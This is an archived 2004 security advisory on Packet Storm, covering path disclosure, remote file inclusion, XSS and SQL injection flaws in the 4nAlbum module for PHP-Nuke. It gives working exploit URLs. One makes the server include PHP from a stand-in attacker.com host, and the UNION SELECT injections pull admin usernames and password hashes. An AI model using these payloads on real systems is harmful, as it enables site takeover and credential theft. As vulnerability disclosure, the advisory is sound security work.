exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

waraxe-2004-SA006.txt

waraxe-2004-SA006.txt
Posted Mar 17, 2004
Authored by Janek Vind aka waraxe

The 4nalbum module for PHP-Nuke versions 6.5 to 7.0 suffers from path disclosure, cross site scripting, remote file inclusion, and SQL injection vulnerabilities.

tags | exploit, remote, php, vulnerability, xss, sql injection, file inclusion
SHA-256 | b72910a8ea7f3795a3370ca420ebdd0d9f784cdcd93d78ee2fde747165559de9

waraxe-2004-SA006.txt

Change Mirror Download




{================================================================================}
{ [waraxe-2004-SA#006] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in 4nalbum module for PhpNuke ] }
{ }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 15. March 2004
Location: Estonia, Tartu




Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From developer's infofile:

4nAlbum Version 0.92 (German & English) for phpNUKE Version 6.5 - 7.0 (http://phpnuke.org)
By WarpSpeed (Marco Wiesler) (warpspeed@4thDimension.de) @ Nov/2oo3 http://www.warp-speed.de
@ 4thDimension.de Networking

With this addon/module for phpNUKE you can offer a comfortable
(Media) Album to your users.

- Creating infinite categories and subcategories
- Comfortable Administrationsfunction with helptexts
- Upload from Mediafiles for Members/Guests possible (can be deactivated)
- etc




Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. Full path disclosure:

If we use URL-s below, then we can see standard php error messages with full path disclosure.
This is frequently underestimated security flaw, which can give for potential attacker vital
information, needed to hack further. For example, if we can exploit some sql injection bugs and
logged-in MySql user has file permissions, then the exact full path to the file is needed to successful
file creation or reading.

Examples:

http://localhost/nuke71/modules/4nalbum/public/displaycategory.php





2. Remote file inclusion:

Remote attacker can make GET or POST request with specially crafted parameter and victim server
will include the file from remote server, therefore attacker can make victim server parse any php code,
whatever attacker wants. Of course - if webserver is located behind properly configured firewall, or if
php.ini configuration contains "allow_url_fopen = Off", then it does'nt work...


Examples:

First upload file named "fileFunctions.php" to te www.attacker.com. Then make request:

http://localhost/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://www.attacker.com/


This is the original code from displaycategory.php:

...

include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");

function getThumbnail($img, $galloc) {
global
...






3. Cross-Site scripting aka XSS

XSS is useful for stealing of the cookies, which will lead to bypassing of the authentication and
overtaking of the website (if attacker can get admin-s cookies).


Example:


http://localhost/nuke71/modules/4nalbum/public/nmimage.php?z=[xss code here]

Because PhpNuke will filter some important symbols from GET request, POST request is needed.




4. sql injection

This is my favourite ;) - easy to exploit and the effect is devastating.
Try this:

http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20FROM%20nuke_authors/*

and this:

http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20FROM%20nuke_authors/*


and you will see admin's password md5 hash and username. This is enough to handcraft the cookie and bypass authentication ;)





Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ulljobu, djzone, raider and to all IT freaks in Estonia!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close